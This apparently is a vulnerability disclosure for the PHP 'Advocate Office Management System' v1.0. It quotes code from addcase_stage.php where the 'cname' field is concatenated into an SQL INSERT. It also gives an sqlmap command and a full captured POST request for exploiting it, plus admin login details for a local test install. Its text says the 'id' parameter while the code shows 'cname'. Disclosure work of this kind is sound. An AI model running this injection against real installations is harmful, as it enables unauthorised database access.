https://www.sourcecodester.com/php/17280/advocate-office-management-system-free-download.html
v1.0
PHP, Apache, MySQL
http://127.0.0.1/kortex_lite/control/login.php
mayuri.infospace@gmail.com
admin
/control/addcase_stage.php
In this scenario, the value of user input (the id parameter) is directly concatenated into an SQL query without undergoing any form of filtering or utilizing prepared statements, causing the application vulnerable to SQL injection attack
38: if(isset($_POST['add'])){
39: $cname = $_POST['cname'];
47: $sql = "INSERT INTO case_stage(name,status) VALUES ('$cname','1')";Payload:
sqlmap -r request.txt --current-user --batch --dbms mysqlBurp Request:
POST /kortex_lite/control/addcase_stage.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 227
Cache-Control: max-age=0
sec-ch-ua: "Not(A:Brand";v="24", "Chromium";v="122"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH69K8ihjhi62Hye9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/kortex_lite/control/addcase_stage.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=ihtlup31vclhigou4q6if7fl1u
Connection: close
------WebKitFormBoundaryH69K8ihjhi62Hye9
Content-Disposition: form-data; name="cname"
1
------WebKitFormBoundaryH69K8ihjhi62Hye9
Content-Disposition: form-data; name="add"
------WebKitFormBoundaryH69K8ihjhi62Hye9--